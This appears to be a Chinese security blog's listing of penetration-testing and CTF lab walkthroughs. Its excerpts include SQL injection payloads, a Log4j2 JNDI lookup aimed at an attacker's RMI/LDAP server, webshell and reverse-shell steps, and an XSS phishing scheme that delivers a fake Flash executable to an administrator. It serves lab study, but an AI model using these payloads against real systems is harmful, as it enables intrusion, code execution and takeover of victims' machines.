- 博客(39)
- 收藏
- 关注
RSS订阅原创 Sapido-路由器远程命令执行漏洞
Sapido路由器在未授权的情况下,任意访问者可以以Root权限执行命令。app="Sapido-路由器"固件中存在一个asp文件为。,可以在当前页面执行命令。
2025-03-30 16:36:30
341
原创 FALL靶场通关攻略
1,下载好靶机后打开,通过kali扫描靶机ip和端口,得到靶机ip为192.168.50.144。8,使用得到的私钥登陆qiu用户,查看历史记录文件得到密码,然后进行提权。4,访问扫描到的test.php,得到缺少GET请求参数的提示。6,来通过参数访问/etc/passwd,发现可以尝试文件包含。5,使用FUZZ来扫出参数为file。7,通关文件包含获得私钥。
2025-03-27 20:03:48
418
原创 Apache Tomcat RCE漏洞(CVE-2025-24813)
该漏洞在于 Tomcat 在处理不完整PUT请求上传时,会使用了一个基于用户提供的文件名和路径生成的临时文件。3,应用程序使用 Tomcat 的基于文件的会话持久化(默认存储位置)2,当存在反序列化利用链时,可以上传包含恶意序列化数据的文件。1,默认 Servlet 启用了写权限(默认禁用)4,应用程序包含可被利用于反序列化攻击的库。2,启用了部分PUT请求支持(默认启用)
2025-03-25 23:12:16
739
原创 Thales靶场通关攻略
2,使用kali扫描靶机ip和端口,得出靶机ip为192.168.56.101 端口开着8080和22。1,将下载好的环境导入 VritualBox,并将桥接模式网卡设置为 Host-only。6,我们使用哥斯拉生成一个JSP文件,然后压缩为ZIP文件,修改后缀为war,进行上传。9,在哥斯拉打开靶场的终端,输入命令反弹shell,记得在kali开启监听。4,尝试登陆后台,发现需要用户名和密码,我们使用msf爆破账号和密码。5,登陆后台,下拉发现可以上传文件。8,使用哥斯拉进行连接。
2025-03-25 19:45:14
425
原创 IIS漏洞攻略
2,编辑请求头,增加Range: bytes=0-18446744073709551615字段,看是否存在HTTP.SYS远程代码执行漏洞,返回为416说明存在。1,在windows server 2003 中开启 WebDAV 和写权限,然后访问并使用BP抓包。3,使用payload验证目标是否存在IIS短文件名漏洞,得到的界面为404,说明存在该短文件名。1,访问 windows server 2012 的网站,并使用BP进行抓包。3,将上传的木马文件的内容写入到asp文件中,然后进行连接即可。
2025-03-24 21:48:23
446
原创 Shiro漏洞攻略
Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会⽣成经过 加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反 序列化,就导致了反序列化RCE漏洞。
2025-03-24 21:31:58
362
原创 Spring漏洞攻略
2,访问/customers/1,使用BP抓取数据包,修改为patch请求方式,并添加数据进行发送。1,开启环境后访问/customers/1。3,进入docker容器中查看发现运行成功。2,填写内容,上传进行抓包,并修改请求数据。3,进入docker容器中查看发现运行成功。1,开启环境后进行访问。
2025-03-24 21:26:37
293
原创 struts2漏洞攻略
在url输入http://47.108.150.249:8081/struts2-showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加。将第二步中的${(123+123)}替换为以下内容。靶场: /struts2/s2-057。
2025-03-24 19:39:58
512
原创 Thinkphp(TP)漏洞攻略
在输入框中输入以下内容在根目录生成1.php文件,输出phpinfo。靶场:vulhub/thinkphp/5-rce。也可以使用远程命令/远程代码来执行。
2025-03-24 19:27:49
584
原创 jangow-01-1.0.1靶机攻略
10,前面扫描端口发现21端口开着,我们尝试在kali上用找到的用户名和密码登陆ftp。1,安装好靶机后打开进行配置,按住shift,在图一界面按e进去得到图二。2,打开kali扫描靶机ip,得到靶机ip为192.168.50.142。6,我们随便点点看能不能发现什么,点击右上角的Buscar得到下图界面。ip a查看网卡信息,修改配置文件网卡信息,修改后按回车进入图四。7,打开后发现搜索框中可能可以进行传参,我们尝试写一句话木马。13,返回kali查看监听,发现成功反弹shell。9,尝试找到账号密码。
2025-03-24 19:11:39
660
原创 Jboss漏洞攻略
3,找到void addURL() 选项远程加载war包来部署,用我们前面用到的shell.war。正常环境⽆需密码直接可进⼊,需要用户名密码就是admin admin。3,上传文件,将JSP压缩为ZIP,修改后缀为war上传。2,找到图1所示内容点击,在图2位置部署远程war包地址。4,部署后会跳到如图所示页面,使用哥斯拉连接就可以了。3,点击Invoke,来到如图页面。1,搭建好环境后访问漏洞地址。1,搭建好环境后直接访问。1,搭建好环境后访问。1,搭建好环境后访问。2,找到如图所示位置。
2025-03-23 19:55:16
1376
原创 WebLogic漏洞攻略
4,进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬录⽆需权限。3,访问以下 URL ,连接 2 个漏洞并执⾏命令,然后进入docker中查看,发现命令成功运行。1,搭建好环境后访问并登陆后台,默认账号密码:weblogic/Oracle@123。2,点击部署,点击安装,将JSP木马压缩为ZIP,修改后缀为war进行上传。2,在当前页面抓包,修改请求包,发送到重放器中发送。5,点击安全,上传木马,并找到对应的时间戳。1,搭建好环境后访问。
2025-03-23 18:41:17
634
原创 Tomcat漏洞攻略
2,tomcat默认的conf/server.xml中配置了2个Connector,⼀个是对外提供的HTTP协议端⼝, 另 外⼀个就是默认的 8009 AJP协议端⼝,两个端⼝默认均监听在外⽹ip。1,搭建好环境后进入后台,在tomcat8环境下默认进⼊后台的密码为 tomcat/tomcat。4,⽂件上传成功后,默认会在⽹站根⽬录下⽣成和war包名称⼀致得⽬录,我们使用哥斯拉进行连接。3,将抓包得到的数据发送到重放器,修改为PUT方式提交,使用哥斯拉密码秘钥配置。2,在网站的首页进行抓包。
2025-03-23 15:23:16
453
原创 Apache漏洞攻略
该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件1,搭建好环境后访问docker pull blueteamsteve/cve-2021-41773:no-cgid2,我们直接使用工具来验证漏洞以及漏洞利用
2025-03-23 14:33:44
261
原创 DeDeCMS漏洞
2,在如图所示位置将主页位置改为index.php,并选上生成静态,然后更新主页HTML后对主页进行访问。2,into outfile写入一句话木马,然后访问webshell.php。1,在如图所示位置执⾏ select @@basedir,获得绝对路径。1,在如图所示位置找到index.htm文件,在文件中加入一句话木马。1,在如图所示位置写入一句话木马然后上传。2,在如图所示位置上传一个php文件。1,安装好靶场后访问并登陆后台。2,上传后点代码,得到下图界面。3,进行访问,然后使用蚁剑连接。
2025-03-20 20:49:03
423
原创 WordPress漏洞
2,在如图所示的位置选择一个php文件写入一句话木马,我们这里选择在404.php中写入。2,下载一个主题包,并将一句话木马压缩到主题包的压缩文件中进行上传,然后进行访问。3,访问404.php。1,找到如图所示的页面。1,安装好靶场后访问。
2025-03-20 20:30:30
691
原创 Web-Machine-N7靶机通关攻略
发现只有admin才能进去,使用BP对该页面进行抓包,将role=后的数据修改为admin后放行就得到了后半段flag。6,将role=后的数据依次进行两次URL解码,一次base64解码,一次md5解密后得到结果为admin。3,访问exploit.html发现可以上传文件,我们上传一个文件得到了前半个flag。4,访问enter_network发现了登录框。5,随便输入用户名和密码登陆使用BP进行抓包。2,使用kali扫描目录。1,扫描出靶机ip访问。
2025-03-20 20:19:59
394
原创 matrix-breakout-2-morpheus通关攻略
3,访问靶机ip和扫描出的目录,发现在192.168.50.141/graffiti.php存在输入框。4,在输入框输入内容上传,使用BP抓包拦截发现上传的内容到了graffiti.txt。1,安装好靶机后打开,打开kali扫描靶机ip,端口和目录。6,使用蚁剑进行连接,可以在根目录找到flag.txt。5,在BP中尝试写一句话木马到shell.php。2,使用gobuster再次扫描。7,反弹shell监听。
2025-03-19 19:12:10
753
原创 Log4j2漏洞实战
7,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:rmi://45.122.51.245:1099/5ltonm}可以看到⽹⻚被重定向到了我们的恶意类⽹址,回到宝塔查看。3,访问http://47.122.51.245:8983/solr/admin/coresaction=${jndi:ldap://${sys:java.version}.2bfvl6.dnslog.cn}4,返回dnslog.cn查看是否有回显。
2025-03-19 00:20:49
431
原创 joker靶机攻略
8,上传一个一句话木马,在如图所示位置,然后使用蚁剑进行连接http://192.168.50.139:8080/templates/beez3/234.php。5,我们随便输入用户名和密码使用BP抓包爆破,这里需要用到第三步获得rockyou字典的的前100个。1,安装好靶机并打开,打开kali扫描得到靶机ip为192.168.50.139。7,登陆靶机8080端口,发现是joomla框架的网页,尝试使用弱口令登陆后台。4,通过第一步的扫描可以发现靶机开了8080端口,我们进行访问。
2025-03-18 19:16:05
546
原创 Billu_b0x靶机攻略
3,访问test.php发现file参数为空,尝试拼接其他路径来访问,发现可以file传参,利用插件进行post传参,在c.php中发现用户名和密码,进行登陆数据库。1,安装好靶机并打开,打开kali进行扫描得到靶机ip为192.168.50.138。账号:billu 密码:b0x_billu。5,上传一个图片马,发现上传成功,然后查看图片路径。4,在数据库中查找后台用户名和密码并进行登陆。2,访问靶机以及扫描出的目录。6,进行POST传参。7,使用蚁剑进行连接。
2025-03-18 18:49:46
743
原创 文件解析漏洞
在iis的⽹站根⽬录新建⼀个名为q.asp的⽂件,在q.asp中新建⼀个txt⽂件在外部浏览器中访问windows2003的iis⽹站中的1.txt 发现asp代码被执⾏。
2025-03-17 17:12:05
510
原创 Hackme靶机通关攻略
3,注册后登陆发现有输入框,可以尝试使用sql注入来得到用户名和密码,密码需要进行MD5解密,sql注入我们前面的文章专门有讲,这里就不详细说明了。1,打开靶机和kali,在kali终端中扫描靶机ip,得到靶机ip为192.168.50.137。7,访问uploads目录,可以看到我们上传的文件,然后使用菜刀进行连接。5,写一句话木马并保存为.jpg文件,上传此文件后使用BP抓包。2,使用工具扫描出后台目录后访问login.php。4,我们选择一组用户名和密码去登陆。6,修改.jpg为.php放行。
2025-03-13 19:05:26
411
原创 tomato靶机通关攻略
2,得到靶机ip为192.168.50.135,用浏览器访问。1,打开靶机和kali,然后在kali中探测靶机ip。8,写入一句话木马然后使用菜刀进行连接,密码是abc。5,我们可以找到一个info.php文件,打开。3,再次使用kali扫描敏感目录。6,查看页面源代码,发现可以传参。
2025-03-12 20:34:45
682
原创 upload-labs-master通关攻略(1-19关)
1,在桌面新建一个1.php文档2,打开pass-1并上传1.php发现失败3,点击F12,将检查文件类型的内容删去(如图)然后再次上传就成功了4,右键图片在新标签页打开,使用菜刀检查是否能连接。
2025-03-11 21:48:12
2301
原创 XXE靶机通关攻略
12,将得到的乱码进行base64解密,然后保存为php文件放到www目录下查看,得到结果。4,访问/xee,随便输入用户名和密码,然后使用BP抓包,并将抓包后的数据发送到重放器。10,查看页面源代码,然后对数据进行base32解密,再进行base64解密。7,将解码得到的内容保存到文本文档中,并修改扩展名为.html,然后访问。11,回到我们使用BP抓的包,去查看/etc/.flag.php。9,输入用户名和密码后点击Flag,发现还有一个文件,然后访问。6,将得到的内容进行base64解码。
2025-03-10 20:44:04
445
原创 xxe-lab 通关攻略
3,将抓包得到的内容发送到重放器中并判断回显位,得出回显位在username。1,在自己电脑任意位置创建一个1.txt的文档,内容随便。2,打开靶场后随便输入用户名和密码,然后用BP抓包。5,采用xxe注入攻击得到1.txt里的内容。
2025-03-10 19:14:52
340
原创 CTFub-SSRF通关攻略
5,编码后复制到文本文档中,将其中的%0A全部替换为%0d%0a,并在末尾加上%0d%0a,然后再进行一次编码。5,将数据包进行编码,然后将其中的%0A全部替换为%0d%0a,并在末尾也加上%od%oa。1,打开环境后根据提示访问file:///var/www/html/flag.php。3,将得到的数据进行编码并访问,发现会一直转圈,然后访问shell.php。1,打开环境后访问 http://127.0.0.1/flag.php。1,打开环境后访问http://127.0.0.1/flag.php。
2025-03-09 22:21:00
391
原创 CSRF漏洞攻略
7,使用另一个浏览器当作被攻击者访问http://192.168.19.1/hy.html 然后用一开始的用户名和密码登陆发现无法登陆,用刚刚设置的密码登陆成功进入后台,这样我们就利用CSRF漏洞修改了管理员密码。2,访问http://localhost/MetInfo5.3.1 然后按下图完成操作,在安装完成后点击管理网站并输入用户名和密码。6,在我们的网站www目录下新建一个文本文档并修改为.html文件,将复制的代码粘贴进去保存,我们这里文件名为hy.html。
2025-03-06 19:26:44
247
原创 通过XSS攻击钓鱼控制windows电脑
6,搭建一个类似flash官网的网站,将下图中的六个文件放到假网站的根目录,下载的文件在index.html中修改,修改为真的flash安装包名字(如下图二所示),1.js中也使用真的flash安装包名字(如下图三所示)5,点击立即升级后会下载一个可执行程序,控制下载文件的代码在1.js中,新建一个文件并改名为flash.exe ,再将1.js文件进行修改,如图。3,目标为pikachu后台的管理员,找一个xss漏洞让管理员的页面引用外部的我们的js文件。2,将代码保存成js文件。
2025-03-05 21:45:22
384
原创 CTF4通关攻略
将靶机网络连接设置为NAT模式,在Kali中发现靶机IP为192.168.50.133。在参数后加个单引号发现有报错,说明可以使用SQL注入。2,访问192.168.50.133。3.随便点击页面尝试使用SQL注入。5,用获得的用户名和密码进行登陆。我们这里使用第一组用户名和密码。4,使用sqlmap进行注入。
2025-03-04 22:45:14
586
原创 sqli-labs通关攻略(16-20)
1,打开less-16并判断闭合方式2,使用BP工具进行爆破得到下表(库名)3,如步骤二所示,使用对应的命令依次爆破出表名,字段名和数据。
2025-03-04 21:38:41
839
原创 ai-web 1.0通关攻略
1,获取靶机ip为192.168.50.132。4,在kali中使用dirb分别扫描两个路径。cmd是木马的参数,点击测试连接就可以通关了。3,获得绝对路径(使用御剑)2,浏览器访问此ip。
2025-03-03 23:41:53
232
原创 sqli-labs通关攻略(13-15)
1,打开less-13并判断闭合方式2,使用 1')and extractvalue(1,concat(0x7e,(select database())))# 来构造报错3,使用 1')and extractvalue(1,concat(0x7e,(select table_name from.tables where table_schema=database() limit 0,1)))# 爆表。
2025-03-03 21:14:05
561
原创 sqli-labs通关攻略(9-12)
1,打开less-9并判断闭合方式2,判断数据库长度?3,获得库名(通过ASGII码来判断)?4,获得表长度和表名表长度?表名?5,获得字段长度和字段名字段长度?字段名?6,获得字段内容长度和内容字段内容长度?字段内容?
2025-03-02 16:12:48
608
原创 sqli-labs通关攻略(5-8)
id=1" and updatexml(1,concat('~',(select concat(username,'=',password)from users limit 0,1),'~'),3)--+ 获得信息,使用limit命令获取后面的用户名和密码。id=1' and updatexml(1,concat('~',(select database()),'~'),3)--+ 爆破库。id=1')) and length(database())=8--+ 判断库名长度为8。
2025-02-27 20:32:07
654
原创 sqli-labs通关攻略
id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+ 查看字段。id=-1') union select 1,2,group_concat(username,'~',password) from users --+ 拿到所有的数据。
2025-02-26 20:35:03
1929
原创 ctfhub-web信息泄露通过攻略
(2) 访问后没发现目标,然后访问index.php.bak,下载文件后用记事本打开发现flag,进行提交。(2) 访问index.php.swp,下载文件后使用记事本打开得到结果并提交。(2) 在kali中使用githack还原该文件,点开还原的文件夹得到结果提交。(3) 下载打开后没有发现明文,可能是备份文件,用网页打开,得到结果并提交。(1) 双击打开后得到该页面,得知目标在index.php的源代码中。(2) 在对所有备份文件打开后发现flag在zip中,然后下载打开。
2025-02-25 23:14:45
424
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人